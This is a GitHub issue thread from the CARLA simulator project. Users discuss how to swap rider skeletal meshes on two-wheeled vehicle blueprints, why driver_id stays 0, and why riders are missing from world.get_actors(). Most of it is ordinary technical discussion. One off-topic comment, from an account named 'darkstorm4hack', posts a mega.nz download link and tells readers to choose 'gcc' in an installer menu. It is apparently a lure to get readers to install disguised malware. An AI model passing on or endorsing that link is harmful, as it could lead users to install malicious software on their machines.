carla-simulator/carla #8077: Changing Motorcycle/Bicycle Rider

GoodarzMehr, 2024-08-25:
Hi,

I know that in #7612 you've mentioned that you haven't implemented rider change for the packaged version. I was wondering how should I go about doing that in UE? Specifically, changing the rider of the blueprint using `driver_id` and not directly from the blueprint editor.

My thinking (based on how vehicle colors are changed) has been to add pedestrian meshes to the `Pedestrian Models` array in the `Set Skeletal Mesh from Array` function of `BP_Base2wheeledNew`. But that alone doesn't seem to be enough. What else do I need to do?

darkstorm4hack, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

DnDare, 2024-08-30:
Hi GoodarzMehr,  we've made a test similar to yours, with SetSkeletalmeshAsset,
[image]

So it will randomize the riders you add to the array, is this what you want? or you want to use one specific rider from the array?

Hope this helps,

DnDare, 2024-08-30:
About the driver _id,  pedestrians ( thorugh blueprints) have id at the BP_walker_factory.   Riders don't have an id, 
Riders are skeletal meshes assigned as riders,  maybe you can use the riders_array's index,

GoodarzMehr, 2024-08-31:
Thanks for the info. I'm creating a driving dataset and for the time being my approach (which, shown below, is similar to yours) randomizes the rider skeletal meshes when creating the actors, which satisfies my needs. However, no matter which rider is selected the actor's "driver_id" is 0. I was thinking of, in the future, being able to select the rider's skeletal mesh through the PythonAPI by specifying the index of the skeletal mesh array, instead of that index being selected randomly as it currently is.

[image]
[image]

GoodarzMehr, 2024-09-21:
One thing I recently found out is that doing this (at least my solution) makes CARLA not count riders as actors anymore, i.e. when using `world.get_actors()` nothing is returned for riders.

IrfanNafiz, 2025-06-30:
I'm using both 0.9.15 packaged and dirty UE4 fork for research purposes.

I haven't done any of this and I still can't get rider class (13) in actors.get_actors(). 

Another interesting thing i found is that for all bikes and motorbikes (semantic_class id: 18 and 19) they are assigned 2 semantic tags. One is always 4. It looks like [18, 4] or [19, 4].